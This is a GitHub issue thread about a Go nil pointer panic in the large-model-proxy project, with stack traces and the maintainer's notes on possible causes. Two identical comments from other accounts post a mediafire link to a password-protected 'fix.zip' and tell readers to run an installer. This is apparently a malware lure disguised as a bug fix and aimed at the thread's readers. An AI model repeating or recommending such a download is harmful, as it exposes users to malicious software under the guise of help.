### ISSUE TITLE
Crash at main.canBeStopped({0xc00013a210?, 0x55ed17?})         /large-model-proxy/main.go:427 +0x5b

### ISSUE THREAD

**Issue by perk11** [perk11/large-model-proxy#7]
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x51ec5b]

goroutine 3439 [running]:
sync.(*Mutex).TryLock(...)
        /usr/lib/go/src/sync/mutex.go:99
main.canBeStopped({0xc00013a210?, 0x55ed17?})
        /large-model-proxy/main.go:427 +0x5b
main.startService.func1()
        /large-model-proxy/main.go:281 +0xc5
created by time.goFunc
        /usr/lib/go/src/time/sleep.go:177 +0x2d

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by perk11** [comment]
```
2024/10/07 00:57:01 [Meta-Llama-3.1-8B-Instruct-Q8_0] Opened service connection 127.0.0.1:35858->127.0.0.1:18112
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x50a161]

goroutine 1242 [running]:
sync.(*Mutex).TryLock(...)
        /usr/lib/go-1.18/src/sync/mutex.go:90
main.canBeStopped({0xc000142570?, 0x21?})
        /opt/src/large-model-proxy/main.go:487 +0x61
main.startService.func1()
        /opt/src/large-model-proxy/main.go:306 +0xce
created by time.goFunc
        /usr/lib/go-1.18/src/time/sleep.go:176 +0x32
❯ 

```

**Comment by perk11** [comment]
This appears to be happening when idleTimeout is reached for the processed that was already stopped, even though the idleTimeout is supposed to be stopped at that point. I am going to try to write a test to reproduce this

**Comment by perk11** [comment]
Added tests, but can't quite reproduce this issue, will probably have to fix this without test coverage

**Comment by perk11** [comment]
Possible other cause:

restartOnConnectionFailure: true

One connection fails, but previous one is still open
